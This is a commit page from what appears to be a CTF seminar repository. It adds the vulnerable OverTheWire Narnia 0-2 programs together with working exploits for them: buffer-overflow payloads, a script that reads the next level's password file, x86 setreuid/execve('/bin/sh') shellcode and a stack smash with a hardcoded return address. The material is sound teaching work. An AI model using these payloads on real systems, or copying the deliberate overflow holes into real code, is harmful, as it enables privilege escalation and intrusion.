C01-119/ctf_seminar
6
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity

Семинар по OTW Narnia0-2

Browse source
This commit is contained in:
nihonium 2024-04-16 15:06:15 +03:00
parent aa4b1180f5
commit 6961631ab8
Signed by: nihonium
GPG key ID: 0251623741027CFC
11 changed files with 176 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

40
tasks/pwn/narnia/narnia0/narnia0.c Normal file
View file

@ -0,0 +1,40 @@
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
#include <stdlib.h>
int main(){
long val=0x41414141;
char buf[20];
printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
printf("Here is your chance: ");
scanf("%24s",&buf);
printf("buf: %s\n",buf);
printf("val: 0x%08x\n",val);
if(val==0xdeadbeef){
setreuid(geteuid(),geteuid());
system("/bin/sh");
}
else {
printf("WAY OFF!!!!\n");
exit(1);
}
return 0;
}

13
tasks/pwn/narnia/narnia0/narnia0_exploit.py Normal file
View file

@ -0,0 +1,13 @@
#!/bin/python3
import time
import sys
# exploit buffer overflow
sys.stdout.buffer.write(b"\x90" * 20 + b"\xef\xbe\xad\xde")
# sync script stdout to narnia0 stdin and wait some time
sys.stdout.flush()
time.sleep(1)
# command to get our next password
sys.stdout.buffer.write(b"cat /etc/narnia_pass/narnia1")

3
tasks/pwn/narnia/narnia1/export_egg.py Normal file
View file

@ -0,0 +1,3 @@
#!/bin/python3
import sys
sys.stdout.buffer.write(b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80")

31
tasks/pwn/narnia/narnia1/narnia1.c Normal file
View file

@ -0,0 +1,31 @@
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
int main(){
int (*ret)();
if(getenv("EGG")==NULL){
printf("Give me something to execute at the env-variable EGG\n");
exit(1);
}
printf("Trying to execute EGG!\n");
ret = getenv("EGG");
ret();
return 0;
}

5
tasks/pwn/narnia/narnia1/shellcode Normal file
View file

@ -0,0 +1,5 @@
\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80
len: 34
export SHELLCODE=$(python3 -c 'import sys;sys.stdout.buffer.write(b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80")')

36
tasks/pwn/narnia/narnia1/shellcode.c Normal file
View file

@ -0,0 +1,36 @@
/*
* (Linux/x86) setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL])
* - 33 bytes
* - xgc@gotfault.net
*
*/
char shellcode[] =
// setreuid(0, 0)
"\x6a\x46" // push $0x46
"\x58" // pop %eax
"\x31\xdb" // xor %ebx, %ebx
"\x31\xc9" // xor %ecx, %ecx
"\xcd\x80" // int $0x80
// execve("/bin/sh")
"\x31\xd2" // xor %edx, %edx
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68"// push $0x68732f2f
// [h, s, /, /]
"\x68\x2f\x62\x69\x6e"// push $0x6e69622f
// [n, i, b, /]
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80"; // int $0x80
int main() {
int (*f)() = (int(*)())shellcode;
printf("Length: %u\n", strlen(shellcode));
f();
}

6
tasks/pwn/narnia/narnia2/esp.c Normal file
View file

@ -0,0 +1,6 @@
#include <string.h>
#include <stdio.h>
void main(int argc, char *argv[]) {
register int i asm("esp");
printf("$esp = %#010x\n", i);
}

33
tasks/pwn/narnia/narnia2/narnia2.c Normal file
View file

@ -0,0 +1,33 @@
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char * argv[]){
char buf[128];
if(argc == 1){
printf("Usage: %s argument\n", argv[0]);
exit(1);
}
strcpy(buf,argv[1]);
printf("%s", buf);
return 0;
}

9
tasks/pwn/narnia/narnia2/shellcode.py Normal file
View file

@ -0,0 +1,9 @@
#!/bin/python3
import sys
shellcode=b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"
# -112 for real world
# address=b"\x18\xd4\xff\xff"
address=b"\xa8\xd3\xff\xff"
sys.stdout.buffer.write(shellcode)
sys.stdout.buffer.write((132-len(shellcode)) * b"\x90" + address)